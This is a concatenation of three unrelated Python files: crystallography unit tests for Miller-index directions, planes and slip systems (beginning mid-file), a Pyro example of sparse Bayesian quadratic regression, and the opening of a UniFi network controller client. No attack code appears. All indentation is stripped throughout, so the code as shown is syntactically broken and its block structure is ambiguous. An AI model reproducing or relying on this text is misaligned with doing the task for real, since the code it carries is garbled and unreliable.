self.assertAlmostEqual(d111.angle_with_direction(d110) * 180 / np.pi, 35.26, 2)
self.assertAlmostEqual(d111.angle_with_direction(dm111) * 180 / np.pi, 70.528, 2)
def test_tetragonal_direction(self):
bct = Lattice.body_centered_tetragonal(0.28, 0.40)
d111 = HklDirection(1, 1, 1, bct)
d110 = HklDirection(1, 1, 0, bct)
self.assertAlmostEqual(d111.direction()[0], 0.49746834, 5)
self.assertAlmostEqual(d111.direction()[1], 0.49746834, 5)
self.assertAlmostEqual(d111.direction()[2], 0.71066905, 5)
self.assertAlmostEqual(d110.direction()[0], 0.707106781, 5)
self.assertAlmostEqual(d110.direction()[1], 0.707106781, 5)
self.assertAlmostEqual(d110.direction()[2], 0.0, 5)
def test_tetragonal_direction2(self):
ZrO2 = Lattice.tetragonal(0.364, 0.527)
d = HklDirection(1, 1, 1, ZrO2)
target = np.array([1., 1., 1.448])
target /= np.linalg.norm(target)
self.assertAlmostEqual(d.direction()[0], target[0], 4)
self.assertAlmostEqual(d.direction()[1], target[1], 4)
self.assertAlmostEqual(d.direction()[2], target[2], 4)
def test_angle_with_directions(self):
(a, b, c) = (1.022, 0.596, 0.481)
olivine = Lattice.orthorhombic(a, b, c)
(h1, k1, l1) = (1., 1., 1.)
(h2, k2, l2) = (3., 3., 2.)
d1 = HklDirection(h1, k1, l1, olivine)
d2 = HklDirection(h2, k2, l2, olivine)
# compare with formula in orthorhombic lattice, angle must be 6.589 degrees
angle = np.arccos(((h1 * h2 * a ** 2) + (k1 * k2 * b ** 2) + (l1 * l2 * c ** 2)) /
(np.sqrt(a ** 2 * h1 ** 2 + b ** 2 * k1 ** 2 + c ** 2 * l1 ** 2) *
np.sqrt(a ** 2 * h2 ** 2 + b ** 2 * k2 ** 2 + c ** 2 * l2 ** 2)))
self.assertAlmostEqual(d1.angle_with_direction(d2), angle)
def test_skip_higher_order(self):
uvw = HklDirection(3, 3, 1)
hkl_planes = uvw.find_planes_in_zone(max_miller=3)
self.assertEqual(len(hkl_planes), 18)
hkl_planes2 = HklObject.skip_higher_order(hkl_planes)
self.assertEqual(len(hkl_planes2), 7)
def test_4indices_representation(self):
u, v, w = HklDirection.four_to_three_indices(2, -1, -1, 0)
self.assertEqual(u, 1)
self.assertEqual(v, 0)
self.assertEqual(w, 0)
u, v, w = HklDirection.four_to_three_indices(1, 0, -1, 1)
self.assertEqual(u, 2)
self.assertEqual(v, 1)
self.assertEqual(w, 1)
U, V, T, W = HklDirection.three_to_four_indices(1, 1, 1)
self.assertEqual(U, 1)
self.assertEqual(V, 1)
self.assertEqual(T, -2)
self.assertEqual(W, 3)
U, V, T, W = HklDirection.three_to_four_indices(2, 1, 0)
self.assertEqual(U, 1)
self.assertEqual(V, 0)
self.assertEqual(T, -1)
self.assertEqual(W, 0)
class HklPlaneTests(unittest.TestCase):
def setUp(self):
print('testing the HklPlane class')
self.hex = Lattice.hexagonal(0.2931, 0.4694) # nm
def test_equality(self):
p1 = HklPlane(1, 1, 1)
p2 = HklPlane(1, 1, 1)
p3 = HklPlane(-1, 1, 1)
self.assertEqual(p1, p2)
self.assertTrue(p1 == p2)
self.assertTrue(p1 != p3)
def test_HklPlane(self):
p = HklPlane(1, 1, 1)
n = p.normal()
self.assertEqual(np.linalg.norm(n), 1)
def test_get_family(self):
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.cubic)), 3)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family('111', crystal_structure=Symmetry.cubic)), 4)
self.assertEqual(len(HklPlane.get_family('111', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family('011', crystal_structure=Symmetry.cubic)), 6)
self.assertEqual(len(HklPlane.get_family('011', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 12)
self.assertEqual(len(HklPlane.get_family('112', crystal_structure=Symmetry.cubic)), 12)
self.assertEqual(len(HklPlane.get_family('112', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 24)
self.assertEqual(len(HklPlane.get_family('123', crystal_structure=Symmetry.cubic)), 24)
self.assertEqual(len(HklPlane.get_family('123', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 48)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.tetragonal)), 1)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 2)
self.assertEqual(len(HklPlane.get_family('010', crystal_structure=Symmetry.tetragonal)), 2)
self.assertEqual(len(HklPlane.get_family('010', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 4)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.tetragonal)), 2)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 4)
self.assertEqual(len(HklPlane.get_family([1, 0, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([-1, 0, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([0, 1, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([0, -1, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.hexagonal)), 1)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 2)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.hexagonal)), 3)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family((1, 0, -1, 0), crystal_structure=Symmetry.hexagonal)), 3)
self.assertEqual(len(HklPlane.get_family((1, 0, -1, 0), crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family('102', crystal_structure=Symmetry.hexagonal)), 6)
self.assertEqual(len(HklPlane.get_family('102', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 12)
def test_multiplicity(self):
"""Int Tables of Crystallography Vol. 1 p 32."""
self.assertEqual(HklPlane(1, 0, 0).multiplicity(symmetry=Symmetry.cubic), 6)
for h in range(1, 4):
self.assertEqual(HklPlane(h, 0, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(0, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(h, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(-h, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(h, h, 1).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-h, h, 1).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, 0, 1).multiplicity(symmetry=Symmetry.tetragonal), 2)
self.assertEqual(HklPlane(1, 0, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-1, 0, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, 1, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, -1, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(1, 2, 0).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-1, 2, 0).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(1, 2, 3).multiplicity(symmetry=Symmetry.tetragonal), 16)
def test_HklPlane_normal(self):
ZrO2 = Lattice.tetragonal(3.64, 5.27)
p = HklPlane(1, 1, 1, ZrO2)
n = p.normal()
self.assertAlmostEqual(n[0], 0.635, 3)
self.assertAlmostEqual(n[1], 0.635, 3)
self.assertAlmostEqual(n[2], 0.439, 3)
def test_110_normal_monoclinic(self):
"""Testing (110) plane normal in monoclinic crystal structure.
This test comes from
http://www.mse.mtu.edu/~drjohn/my3200/stereo/sg5.html
corrected for a few errors in the html page.
In this test, the lattice is defined with the c-axis aligned with the Z direction of the Cartesian frame.
"""
Mg2Si = Lattice.from_parameters(1.534, 0.405, 0.683, 90., 106., 90., x_aligned_with_a=False)
a = Mg2Si.matrix[0]
b = Mg2Si.matrix[1]
c = Mg2Si.matrix[2]
self.assertAlmostEqual(a[0], 1.475, 3)
self.assertAlmostEqual(a[1], 0., 3)
self.assertAlmostEqual(a[2], -0.423, 3)
self.assertAlmostEqual(b[0], 0., 3)
self.assertAlmostEqual(b[1], 0.405, 3)
self.assertAlmostEqual(b[2], 0., 3)
self.assertAlmostEqual(c[0], 0., 3)
self.assertAlmostEqual(c[1], 0., 3)
self.assertAlmostEqual(c[2], 0.683, 3)
p = HklPlane(1, 1, 1, Mg2Si)
Gc = p.scattering_vector()
self.assertAlmostEqual(Gc[0], 1.098, 3)
self.assertAlmostEqual(Gc[1], 2.469, 3)
self.assertAlmostEqual(Gc[2], 1.464, 3)
self.assertAlmostEqual(p.interplanar_spacing(), 0.325, 3)
Ghkl = np.dot(Mg2Si.matrix, Gc)
self.assertEqual(Ghkl[0], 1.) # h
self.assertEqual(Ghkl[1], 1.) # k
self.assertEqual(Ghkl[2], 1.) # l
def test_scattering_vector(self):
Fe_fcc = Lattice.face_centered_cubic(0.287) # FCC iron
hkl = HklPlane(2, 0, 0, Fe_fcc)
Gc = hkl.scattering_vector()
self.assertAlmostEqual(np.linalg.norm(Gc), 1 / hkl.interplanar_spacing())
Al_fcc = Lattice.face_centered_cubic(0.405)
hkl = HklPlane(0, 0, 2, lattice=Al_fcc)
Gc = hkl.scattering_vector()
self.assertAlmostEqual(np.linalg.norm(Gc), 1 / hkl.interplanar_spacing())
def test_scattering_vector_th(self):
""" compute the scattering vector using the formal definition and compare it with the components obtained
using the reciprocal lattice.
The formulae are available in the Laue Atlas p61, one typo in Eq. 6.1 was corrected. """
(a, b, c) = self.hex._lengths
(alpha, beta, gamma) = np.radians(self.hex._angles)
delta = pi / 2 - gamma
chi = gamma - atan((cos(alpha) - cos(gamma) * cos(beta)) / (cos(beta) * cos(delta)))
epsilon = pi / 2 - acos((cos(alpha) + cos(beta)) / (cos(chi) + cos(gamma - chi)))
psi = acos(sin(epsilon) * cos(delta + chi))
for (hp, kp, lp) in [(1, 1, 1), [1, 2, 0]]:
# compute the h, k, l in the Cartesian coordinate system
h = hp / a
k = (a / hp - b / kp * cos(gamma)) / (a / hp * b / kp * cos(delta))
l = (lp / c - hp / a * cos(beta) - kp / b * cos(psi)) / cos(epsilon)
Gc = HklPlane(hp, kp, lp, self.hex).scattering_vector()
self.assertAlmostEqual(Gc[0], h, 7)
self.assertAlmostEqual(Gc[1], k, 7)
self.assertAlmostEqual(Gc[2], l, 7)
def test_bragg_angle(self):
l = Lattice.cubic(0.287) # FCC iron
hkl = HklPlane(2, 0, 0, l) # 200 reflection at 8 keV is at 32.7 deg
self.assertAlmostEqual(hkl.bragg_angle(8), 0.5704164)
def test_4indices_representation(self):
h, k, l = HklPlane.four_to_three_indices(2, -1, -1, 0)
self.assertEqual(h, 2)
self.assertEqual(k, -1)
self.assertEqual(l, 0)
h, k, l = HklPlane.four_to_three_indices(1, 0, -1, 1)
self.assertEqual(h, 1)
self.assertEqual(k, 0)
self.assertEqual(l, 1)
h, k, i, l = HklPlane.three_to_four_indices(1, 1, 1)
self.assertEqual(h, 1)
self.assertEqual(k, 1)
self.assertEqual(i, -2)
self.assertEqual(l, 1)
h, k, i, l = HklPlane.three_to_four_indices(2, 1, 0)
self.assertEqual(h, 2)
self.assertEqual(k, 1)
self.assertEqual(i, -3)
self.assertEqual(l, 0)
class SlipSystemTests(unittest.TestCase):
def setUp(self):
print('testing the SlipSystem class')
def test_get_slip_system(self):
ss = SlipSystem.get_slip_systems('111')
self.assertEqual(len(ss), 12)
for s in ss:
n = s.get_slip_plane().normal()
l = s.get_slip_direction().direction()
self.assertAlmostEqual(np.dot(n, l), 0.)
ss = SlipSystem.get_slip_systems('112')
self.assertEqual(len(ss), 12)
for s in ss:
n = s.get_slip_plane().normal()
l = s.get_slip_direction().direction()
self.assertAlmostEqual(np.dot(n, l), 0.)
if __name__ == '__main__':
unittest.main()
|
|
# Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
import argparse
import math
import numpy as np
import torch
from torch.optim import Adam
import pyro
import pyro.distributions as dist
from pyro import poutine
from pyro.infer import Trace_ELBO
from pyro.infer.autoguide import AutoDelta, init_to_median
"""
We demonstrate how to do sparse linear regression using a variant of the
approach described in [1]. This approach is particularly suitable for situations
with many feature dimensions (large P) but not too many datapoints (small N).
In particular we consider a quadratic regressor of the form:
f(X) = constant + sum_i theta_i X_i + sum_{i<j} theta_ij X_i X_j + observation noise
Note that in order to keep the set of identified non-negligible weights theta_i
and theta_ij sparse, the model assumes the weights satisfy a 'strong hierarchy'
condition. See reference [1] for details.
Note that in contrast to [1] we do MAP estimation for the kernel hyperparameters
instead of HMC. This is not expected to be as robust as doing full Bayesian inference,
but in some regimes this works surprisingly well. For the latter HMC approach see
the NumPyro version:
https://github.com/pyro-ppl/numpyro/blob/master/examples/sparse_regression.py
References
[1] The Kernel Interaction Trick: Fast Bayesian Discovery of Pairwise
Interactions in High Dimensions.
Raj Agrawal, Jonathan H. Huggins, Brian Trippe, Tamara Broderick
https://arxiv.org/abs/1905.06501
"""
torch.set_default_tensor_type("torch.FloatTensor")
def dot(X, Z):
return torch.mm(X, Z.t())
# The kernel that corresponds to our quadratic regressor.
def kernel(X, Z, eta1, eta2, c):
eta1sq, eta2sq = eta1.pow(2.0), eta2.pow(2.0)
k1 = 0.5 * eta2sq * (1.0 + dot(X, Z)).pow(2.0)
k2 = -0.5 * eta2sq * dot(X.pow(2.0), Z.pow(2.0))
k3 = (eta1sq - eta2sq) * dot(X, Z)
k4 = c ** 2 - 0.5 * eta2sq
return k1 + k2 + k3 + k4
# Most of the model code is concerned with constructing the sparsity inducing prior.
def model(X, Y, hypers, jitter=1.0e-4):
S, P, N = hypers["expected_sparsity"], X.size(1), X.size(0)
sigma = pyro.sample("sigma", dist.HalfNormal(hypers["alpha3"]))
phi = sigma * (S / math.sqrt(N)) / (P - S)
eta1 = pyro.sample("eta1", dist.HalfCauchy(phi))
msq = pyro.sample("msq", dist.InverseGamma(hypers["alpha1"], hypers["beta1"]))
xisq = pyro.sample("xisq", dist.InverseGamma(hypers["alpha2"], hypers["beta2"]))
eta2 = eta1.pow(2.0) * xisq.sqrt() / msq
lam = pyro.sample(
"lambda", dist.HalfCauchy(torch.ones(P, device=X.device)).to_event(1)
)
kappa = msq.sqrt() * lam / (msq + (eta1 * lam).pow(2.0)).sqrt()
kX = kappa * X
# compute the kernel for the given hyperparameters
k = kernel(kX, kX, eta1, eta2, hypers["c"]) + (sigma ** 2 + jitter) * torch.eye(
N, device=X.device
)
# observe the outputs Y
pyro.sample(
"Y",
dist.MultivariateNormal(torch.zeros(N, device=X.device), covariance_matrix=k),
obs=Y,
)
"""
Here we compute the mean and variance of coefficients theta_i (where i = dimension) as well
as for quadratic coefficients theta_ij for a given (in our case MAP) estimate of the kernel
hyperparameters (eta1, xisq, ...).
Compare to theorem 5.1 in reference [1].
"""
@torch.no_grad()
def compute_posterior_stats(X, Y, msq, lam, eta1, xisq, c, sigma, jitter=1.0e-4):
N, P = X.shape
# prepare for computation of posterior statistics for singleton weights
probe = torch.zeros((P, 2, P), dtype=X.dtype, device=X.device)
probe[:, 0, :] = torch.eye(P, dtype=X.dtype, device=X.device)
probe[:, 1, :] = -torch.eye(P, dtype=X.dtype, device=X.device)
eta2 = eta1.pow(2.0) * xisq.sqrt() / msq
kappa = msq.sqrt() * lam / (msq + (eta1 * lam).pow(2.0)).sqrt()
kX = kappa * X
kprobe = kappa * probe
kprobe = kprobe.reshape(-1, P)
# compute various kernels
k_xx = kernel(kX, kX, eta1, eta2, c) + (jitter + sigma ** 2) * torch.eye(
N, dtype=X.dtype, device=X.device
)
k_xx_inv = torch.inverse(k_xx)
k_probeX = kernel(kprobe, kX, eta1, eta2, c)
k_prbprb = kernel(kprobe, kprobe, eta1, eta2, c)
# compute mean and variance for singleton weights
vec = torch.tensor([0.50, -0.50], dtype=X.dtype, device=X.device)
mu = (
torch.matmul(k_probeX, torch.matmul(k_xx_inv, Y).unsqueeze(-1))
.squeeze(-1)
.reshape(P, 2)
)
mu = (mu * vec).sum(-1)
var = k_prbprb - torch.matmul(k_probeX, torch.matmul(k_xx_inv, k_probeX.t()))
var = var.reshape(P, 2, P, 2).diagonal(dim1=-4, dim2=-2) # 2 2 P
std = (
((var * vec.unsqueeze(-1)).sum(-2) * vec.unsqueeze(-1))
.sum(-2)
.clamp(min=0.0)
.sqrt()
)
# select active dimensions (those that are non-zero with sufficient statistical significance)
active_dims = (((mu - 4.0 * std) > 0.0) | ((mu + 4.0 * std) < 0.0)).bool()
active_dims = active_dims.nonzero(as_tuple=False).squeeze(-1)
print(
"Identified the following active dimensions:",
active_dims.data.numpy().flatten(),
)
print("Mean estimate for active singleton weights:\n", mu[active_dims].data.numpy())
# if there are 0 or 1 active dimensions there are no quadratic weights to be found
M = len(active_dims)
if M < 2:
return active_dims.data.numpy(), []
# prep for computation of posterior statistics for quadratic weights
left_dims, right_dims = torch.ones(M, M).triu(1).nonzero(as_tuple=False).t()
left_dims, right_dims = active_dims[left_dims], active_dims[right_dims]
probe = torch.zeros(left_dims.size(0), 4, P, dtype=X.dtype, device=X.device)
left_dims_expand = left_dims.unsqueeze(-1).expand(left_dims.size(0), P)
right_dims_expand = right_dims.unsqueeze(-1).expand(right_dims.size(0), P)
for dim, value in zip(range(4), [1.0, 1.0, -1.0, -1.0]):
probe[:, dim, :].scatter_(-1, left_dims_expand, value)
for dim, value in zip(range(4), [1.0, -1.0, 1.0, -1.0]):
probe[:, dim, :].scatter_(-1, right_dims_expand, value)
kprobe = kappa * probe
kprobe = kprobe.reshape(-1, P)
k_probeX = kernel(kprobe, kX, eta1, eta2, c)
k_prbprb = kernel(kprobe, kprobe, eta1, eta2, c)
# compute mean and covariance for a subset of weights theta_ij (namely those with
# 'active' dimensions i and j)
vec = torch.tensor([0.25, -0.25, -0.25, 0.25], dtype=X.dtype, device=X.device)
mu = (
torch.matmul(k_probeX, torch.matmul(k_xx_inv, Y).unsqueeze(-1))
.squeeze(-1)
.reshape(left_dims.size(0), 4)
)
mu = (mu * vec).sum(-1)
var = k_prbprb - torch.matmul(k_probeX, torch.matmul(k_xx_inv, k_probeX.t()))
var = var.reshape(left_dims.size(0), 4, left_dims.size(0), 4).diagonal(
dim1=-4, dim2=-2
)
std = (
((var * vec.unsqueeze(-1)).sum(-2) * vec.unsqueeze(-1))
.sum(-2)
.clamp(min=0.0)
.sqrt()
)
active_quad_dims = (((mu - 4.0 * std) > 0.0) | ((mu + 4.0 * std) < 0.0)) & (
mu.abs() > 1.0e-4
).bool()
active_quad_dims = active_quad_dims.nonzero(as_tuple=False)
active_quadratic_dims = np.stack(
[
left_dims[active_quad_dims].data.numpy().flatten(),
right_dims[active_quad_dims].data.numpy().flatten(),
],
axis=1,
)
active_quadratic_dims = np.split(
active_quadratic_dims, active_quadratic_dims.shape[0]
)
active_quadratic_dims = [tuple(a.tolist()[0]) for a in active_quadratic_dims]
return active_dims.data.numpy(), active_quadratic_dims
# Create an artifical dataset with N datapoints and P feature dimensions. Of the P
# dimensions S will have non-zero singleton weights and Q(Q-1)/2 pairs of feature dimensions
# will have non-zero quadratic weights.
def get_data(N=20, P=10, S=2, Q=2, sigma_obs=0.15):
assert S < P and P > 3 and S > 2 and Q > 1 and Q <= S
torch.manual_seed(1)
X = torch.randn(N, P)
singleton_weights = 2.0 * torch.rand(S) - 1.0
Y_mean = torch.einsum("ni,i->n", X[:, 0:S], singleton_weights)
quadratic_weights = []
expected_quad_dims = []
for dim1 in range(Q):
for dim2 in range(Q):
if dim1 >= dim2:
continue
expected_quad_dims.append((dim1, dim2))
quadratic_weights.append(2.0 * torch.rand(1) - 1.0)
Y_mean += quadratic_weights[-1] * X[:, dim1] * X[:, dim2]
quadratic_weights = torch.tensor(quadratic_weights)
# we standardize the outputs Y
Y = Y_mean
Y -= Y.mean()
Y_std1 = Y.std()
Y /= Y_std1
Y += sigma_obs * torch.randn(N)
Y -= Y.mean()
Y_std2 = Y.std()
Y /= Y_std2
assert X.shape == (N, P)
assert Y.shape == (N,)
return X, Y, singleton_weights / (Y_std1 * Y_std2), expected_quad_dims
def init_loc_fn(site):
value = init_to_median(site, num_samples=50)
# we also make sure the initial sigma is not too large.
# (otherwise we run the danger of getting stuck in bad local optima during optimization).
if site["name"] == "sigma":
value = 0.1 * value
return value
def main(args):
# setup hyperparameters for the model
hypers = {
"expected_sparsity": max(1.0, args.num_dimensions / 10),
"alpha1": 3.0,
"beta1": 1.0,
"alpha2": 3.0,
"beta2": 1.0,
"alpha3": 1.0,
"c": 1.0,
}
P = args.num_dimensions
S = args.active_dimensions
Q = args.quadratic_dimensions
# generate artificial dataset
X, Y, expected_thetas, expected_quad_dims = get_data(
N=args.num_data, P=P, S=S, Q=Q, sigma_obs=args.sigma
)
loss_fn = Trace_ELBO().differentiable_loss
# We initialize the AutoDelta guide (for MAP estimation) with args.num_trials many
# initial parameters sampled from the vicinity of the median of the prior distribution
# and then continue optimizing with the best performing initialization.
init_losses = []
for restart in range(args.num_restarts):
pyro.clear_param_store()
pyro.set_rng_seed(restart)
guide = AutoDelta(model, init_loc_fn=init_loc_fn)
with torch.no_grad():
init_losses.append(loss_fn(model, guide, X, Y, hypers).item())
pyro.set_rng_seed(np.argmin(init_losses))
pyro.clear_param_store()
guide = AutoDelta(model, init_loc_fn=init_loc_fn)
# Instead of using pyro.infer.SVI and pyro.optim we instead construct our own PyTorch
# optimizer and take charge of gradient-based optimization ourselves.
with poutine.block(), poutine.trace(param_only=True) as param_capture:
guide(X, Y, hypers)
params = list([pyro.param(name).unconstrained() for name in param_capture.trace])
adam = Adam(params, lr=args.lr)
report_frequency = 50
print("Beginning MAP optimization...")
# the optimization loop
for step in range(args.num_steps):
loss = loss_fn(model, guide, X, Y, hypers) / args.num_data
loss.backward()
adam.step()
adam.zero_grad()
# we manually reduce the learning rate according to this schedule
if step in [100, 300, 700, 900]:
adam.param_groups[0]["lr"] *= 0.2
if step % report_frequency == 0 or step == args.num_steps - 1:
print("[step %04d] loss: %.5f" % (step, loss))
print("Expected singleton thetas:\n", expected_thetas.data.numpy())
# we do the final computation using double precision
median = guide.median() # == mode for MAP inference
active_dims, active_quad_dims = compute_posterior_stats(
X.double(),
Y.double(),
median["msq"].double(),
median["lambda"].double(),
median["eta1"].double(),
median["xisq"].double(),
torch.tensor(hypers["c"]).double(),
median["sigma"].double(),
)
expected_active_dims = np.arange(S).tolist()
tp_singletons = len(set(active_dims) & set(expected_active_dims))
fp_singletons = len(set(active_dims) - set(expected_active_dims))
fn_singletons = len(set(expected_active_dims) - set(active_dims))
singleton_stats = (tp_singletons, fp_singletons, fn_singletons)
tp_quads = len(set(active_quad_dims) & set(expected_quad_dims))
fp_quads = len(set(active_quad_dims) - set(expected_quad_dims))
fn_quads = len(set(expected_quad_dims) - set(active_quad_dims))
quad_stats = (tp_quads, fp_quads, fn_quads)
# We report how well we did, i.e. did we recover the sparse set of coefficients
# that we expected for our artificial dataset?
print("[SUMMARY STATS]")
print(
"Singletons (true positive, false positive, false negative): "
+ "(%d, %d, %d)" % singleton_stats
)
print(
"Quadratic (true positive, false positive, false negative): "
+ "(%d, %d, %d)" % quad_stats
)
if __name__ == "__main__":
assert pyro.__version__.startswith("1.7.0")
parser = argparse.ArgumentParser(description="Krylov KIT")
parser.add_argument("--num-data", type=int, default=750)
parser.add_argument("--num-steps", type=int, default=1000)
parser.add_argument("--num-dimensions", type=int, default=100)
parser.add_argument("--num-restarts", type=int, default=10)
parser.add_argument("--sigma", type=float, default=0.05)
parser.add_argument("--active-dimensions", type=int, default=10)
parser.add_argument("--quadratic-dimensions", type=int, default=5)
parser.add_argument("--lr", type=float, default=0.3)
args = parser.parse_args()
main(args)
|
|
"""
Python package to interact with UniFi Controller
"""
import shutil
import time
import warnings
import json
import logging
import requests
from urllib3.exceptions import InsecureRequestWarning
"""For testing purposes:
logging.basicConfig(filename='pyunifi.log', level=logging.WARN,
format='%(asctime)s %(message)s')
""" # pylint: disable=W0105
CONS_LOG = logging.getLogger(__name__)
class APIError(Exception):
"""API Error exceptions"""
def retry_login(func, *args, **kwargs): # pylint: disable=w0613
"""To reattempt login if requests exception(s) occur at time of call"""
def wrapper(*args, **kwargs):
try:
try:
return func(*args, **kwargs)
except (requests.exceptions.RequestException, APIError) as err:
CONS_LOG.warning("Failed to perform %s due to %s", func, err)
controller = args[0]
controller._login() # pylint: disable=w0212
return func(*args, **kwargs)
except Exception as err:
raise APIError(err)
return wrapper
class Controller: # pylint: disable=R0902,R0904
"""Interact with a UniFi controller.
Uses the JSON interface on port 8443 (HTTPS) to communicate with a UniFi
controller. Operations will raise unifi.controller.APIError on obvious
problems (such as login failure), but many errors (such as disconnecting a
nonexistant client) will go unreported.
>>> from unifi.controller import Controller
>>> c = Controller('192.168.1.99', 'admin', 'p4ssw0rd')
>>> for ap in c.get_aps():
... print 'AP named %s with MAC %s' % (ap.get('name'), ap['mac'])
...
AP named Study with MAC dc:9f:db:1a:59:07
AP named Living Room with MAC dc:9f:db:1a:59:08
AP named Garage with MAC dc:9f:db:1a:59:0b
"""
def __init__( # pylint: disable=r0913
self,
host,
username,
password,
port=8443,
version="v5",
site_id="default",
ssl_verify=True,
):
"""
:param host: the address of the controller host; IP or name
:param username: the username to log in with
:param password: the password to log in with
:param port: the port of the controller host
:param version: the base version of the controller API [v4|v5]
:param site_id: the site ID to connect to
:param ssl_verify: Verify the controllers SSL certificate,
can also be "path/to/custom_cert.pem"
"""
self.log = logging.getLogger(__name__ + ".Controller")
self.host = host
self.headers = None
self.version = version
self.port = port
self.username = username
self.password = password
self.site_id = site_id
self.ssl_verify = ssl_verify
if version == "unifiOS":
self.url = "https://" + host + "/proxy/network/"
self.auth_url = self.url + "api/login"
elif version == "UDMP-unifiOS":
self.auth_url = "https://" + host + "/api/auth/login"
self.url = "https://" + host + "/proxy/network/"
elif version[:1] == "v":
if float(version[1:]) < 4:
raise APIError("%s controllers no longer supported" % version)
self.url = "https://" + host + ":" + str(port) + "/"
self.auth_url = self.url + "api/login"
else:
raise APIError("%s controllers no longer supported" % version)
if ssl_verify is False:
warnings.simplefilter("default", category=InsecureRequestWarning)
self.log.debug("Controller for %s", self.url)
self._login()
@staticmethod
def _jsondec(data):
obj = json.loads(data)
if "meta" in obj:
if obj["meta"]["rc"] != "ok":
raise APIError(obj["meta"]["msg"])
if "data" in obj:
result = obj["data"]
else:
result = obj
return result
def _api_url(self):
return self.url + "api/s/" + self.site_id + "/"
@retry_login
def _read(self, url, params=None):
# Try block to handle the unifi server being offline.
response = self.session.get(url, params=params, headers=self.headers)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
return self._jsondec(response.text)
def _api_read(self, url, params=None):
return self._read(self._api_url() + url, params)
@retry_login
def _write(self, url, params=None):
response = self.session.post(url, json=params, headers=self.headers)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
return self._jsondec(response.text)
def _api_write(self, url, params=None):
return self._write(self._api_url() + url, params)
@retry_login
def _update(self, url, params=None):
response = self.session.put(url, json=params, headers=self.headers)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
return self._jsondec(response.text)
def _api_update(self, url, params=None):
return self._update(self._api_url() + url, params)
@retry_login
def _delete(self, url, params=None):
response = self.session.delete(url, json=params, headers=self.headers)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
return self._jsondec(response.text)
def _api_delete(self, url, params=None):
return self._delete(self._api_url() + url, params)
def _login(self):
self.log.debug("login() as %s", self.username)
self.session = requests.Session()
self.session.verify = self.ssl_verify
response = self.session.post(
self.auth_url,
json={"username": self.username, "password": self.password},
headers=self.headers,
)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
if response.status_code != 200:
raise APIError(
"Login failed - status code: %i" % response.status_code
)
def _logout(self):
self.log.debug("logout()")
self._api_write("logout")
self.session.close()
def switch_site(self, name):
"""
Switch to another site
:param name: Site Name
:return: True or APIError
"""
# TODO: Not currently supported on UDMP as site support doesn't exist.
if self.version == "UDMP-unifiOS":
raise APIError(
"Controller version not supported: %s" % self.version
)
for site in self.get_sites():
if site["desc"] == name:
self.site_id = site["name"]
return True
raise APIError("No site %s found" % name)
def get_alerts(self):
"""Return a list of all Alerts."""
return self._api_write("stat/alarm")
def get_alerts_unarchived(self):
"""Return a list of Alerts unarchived."""
params = {"archived": False}
return self._api_write("stat/alarm", params=params)
def get_statistics_last_24h(self):
"""Returns statistical data of the last 24h"""
return self.get_statistics_24h(time.time())
def get_statistics_24h(self, endtime):
"""Return statistical data last 24h from time"""
params = {
"attrs": ["bytes", "num_sta", "time"],
"start": int(endtime - 86400) * 1000,
"end": int(endtime - 3600) * 1000,
}
return self._api_write("stat/report/hourly.site", params)
def get_events(self):
"""Return a list of all Events."""
return self._api_read("stat/event")
